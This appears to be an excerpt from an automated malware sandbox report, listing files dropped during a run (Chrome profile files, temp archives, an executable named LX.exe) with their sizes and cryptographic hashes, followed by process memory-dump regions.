                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          5KB

                                          MD5

                                          d3df3a26585e549f45c033b773fa56f9

                                          SHA1

                                          782f6a56b6b79653e7111519a190bd38a26aba8d

                                          SHA256

                                          157ced7a504bbffa29499b7fc260324dc237d925a29fe3738dbf1698567b9553

                                          SHA512

                                          babac4ea9d2ae9d2d9119d1321fc6cf0d6f2845091f7bb1771d31e272de000ff7e37e169c18471826d399ef1275dd850d7c59ccc5a444e48dbb448c5f2cbcb79

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          5KB

                                          MD5

                                          37853d18da7e3d8c8cd0e4a557d63852

                                          SHA1

                                          024c53338a4041ab10af1a3fd63bdb08bee66ff0

                                          SHA256

                                          c325be6056809f1909164c0f53626a81217cdb7391c3a2d5389996841ec911a9

                                          SHA512

                                          eae478f6dbee90f037f97e0f4dead4bf5e4c4475dc684d72b7db0540428fbfb973b825c6d4a21c3c1805c7684a6a01abad4182f30b1787ed6ad465dc8a7d522a

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT~RFf77f576.TMP

                                          Filesize

                                          16B

                                          MD5

                                          46295cac801e5d4857d09837238a6394

                                          SHA1

                                          44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                          SHA256

                                          0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                          SHA512

                                          8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

                                          Filesize

                                          16B

                                          MD5

                                          18e723571b00fb1694a3bad6c78e4054

                                          SHA1

                                          afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                          SHA256

                                          8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                          SHA512

                                          43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                        • C:\Users\Admin\AppData\Local\Temp\Cab4E41.tmp

                                          Filesize

                                          70KB

                                          MD5

                                          49aebf8cbd62d92ac215b2923fb1b9f5

                                          SHA1

                                          1723be06719828dda65ad804298d0431f6aff976

                                          SHA256

                                          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                          SHA512

                                          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                        • C:\Users\Admin\AppData\Local\Temp\Tar4E63.tmp

                                          Filesize

                                          181KB

                                          MD5

                                          4ea6026cf93ec6338144661bf1202cd1

                                          SHA1

                                          a1dec9044f750ad887935a01430bf49322fbdcb7

                                          SHA256

                                          8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                          SHA512

                                          6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                          Filesize

                                          7KB

                                          MD5

                                          c9de89e34ff11baff209cb716e40468e

                                          SHA1

                                          a1fcde6bdc4e32c6e5f55845ab968aaf73a23f92

                                          SHA256

                                          b877db89da3fc67b7235eb7c00834c8e372e7b2c27139feb1e00ec66ee7e3de3

                                          SHA512

                                          c0b39b933d1ef9a30c3bd246ab4e56e734154011e1ec18a975b343d57ec1f1c245888d27f2aa338e23aa605da594a104d1c29aa945002d7e9226e3734dc48c81

                                        • \Users\Admin\AppData\Local\Temp\LX.exe

                                          Filesize

                                          74KB

                                          MD5

                                          1ab3092297d1806397e8d3a6747a3271

                                          SHA1

                                          ea114a2e5ddee915d30458031ec5ced7f97d1650

                                          SHA256

                                          2aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e

                                          SHA512

                                          1ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28

                                        • memory/2580-13-0x000000001B610000-0x000000001B8F2000-memory.dmp

                                          Filesize

                                          2.9MB

                                        • memory/2580-14-0x00000000022B0000-0x00000000022B8000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/2700-8-0x0000000000050000-0x0000000000068000-memory.dmp

                                          Filesize

                                          96KB

                                        • memory/2700-7-0x000007FEF61F3000-0x000007FEF61F4000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2760-4-0x0000000000400000-0x0000000001D8A000-memory.dmp

                                          Filesize

                                          25.5MB